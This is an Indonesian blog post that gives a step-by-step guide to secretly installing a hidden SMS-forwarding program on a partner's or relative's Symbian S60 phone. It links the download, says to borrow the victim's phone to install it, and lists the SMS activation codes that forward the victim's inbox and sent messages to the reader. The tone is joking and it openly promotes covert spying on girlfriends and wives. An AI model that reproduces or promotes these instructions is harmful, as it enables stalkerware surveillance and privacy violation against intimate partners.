Senin, 19 Desember 2011

Cara menyadap SMS pada Handphone OS Symbian S60 V 1st/2nd


Pernahkan anda merasa curiga dengan cewek, istri atau kerabat dekat anda jangan khawatir kini telah hadir software S60 v1st/2nd  yang berfungsi sebagai penerus sms (Macam iklan Aja  He….he….)
image
software tersebut berfunsi sebagai penerus sms yang masuk, lebih jelasnya program tersebut dapat mengirimkan isi dari inbox atau sent item handphone korban ke handphone kita, jangan kuatir program tersebut tidak mendukung GUI (Graphic User Interface) jadi Perogram tersebut tidak akan nampak, program tersebut bekerja di belakang layar  alias Temuni (“temuni=sembunyi” Gayo Language).
Oke kita sedot aja ya Klik Disini program tersebut terkompres ZIP silakan buka melalui WinRAR, WinZIP,…… Jangan lama-lama nanti Kehabisan heheheheh…… jangan Kuatir  cuma becanda tak akan kehabisan.
Program tersebut berektensi .SIS instalasi default S60. Jika sudah di download tinggal install di handphone korban, untuk minjam HP korban Caranya tidak disediakan disini, Pande.. Pande U aja mintanya (he….he….), Kirim Program tersebut Melalui Bluetooth, Infra red, Kabel Usb, Atau PC suite,  ingat program tersebut bekerja pada handphone S60 V 1st/2nd, Seperti Nokia N-gage, 6600, 7610 dan Masih banyak lagi, untuk LIst hanphone yang Compatible Klik disini.
Jika sudah terinstall terus diapain nih…….  untuk mengaktipkan ikuti Point-point dibawah ini :
  • Untuk mengaktifkan aplikasi ini di handphone Korban, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)ON. Contoh : SA 1234 ON. Kirim SMS ini ke nomor handphone Anda.
  • Untuk menonaktifkannya, ketik SA(spasi)(password)(spasi)OFF. Contoh : SA 1234 OFF. Kirim ke SMS ini ke nomor handphone Anda.
  • Untuk meneruskan SMS yang masuk ke inbox target ke handphone Anda, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)R1. Contoh : SA 1234 R1. Kirim ke nomor handphone Anda.
  • Untuk menonaktifkan fasilitas ini (meneruskan SMS), ketik SA(spasi)(password)(spasi)R0. Contoh :SA 1234 R0. Kirim ke nomor handphone Anda.
  • Untuk meneruskan SMS yang keluar dari handphone target (dari sent item) ke handphone Anda, dengan cara mengirim SMS lewat handphone target dengan mengetikSA(spasi)(password)(spasi)S1. Contoh : SA 1234 S1. Kirim ke nomor handphone Anda.
  • Untuk menonaktifkan fasilitas ini (SMS keluar), ketik SA(spasi)(password)(spasi)S0. Contoh : SA 1234 S0. Kirim ke nomor handphone Anda.
Selamat Program menyadap sms anda telah aktip. tinggal lihat hasilnya lagi,…. o iya ada yang ketinggalan, untuk yang nyadap sms pacarnya siap-siap aja ya untuk sakit hati, saya tidak tanggung jawab bila program ini bisa membuat jantung anda sesak, hati kayak teriris-iris atau  anda putus dengan cewek anda,… hehehehe…. selamat Mencoba !

2 komentar: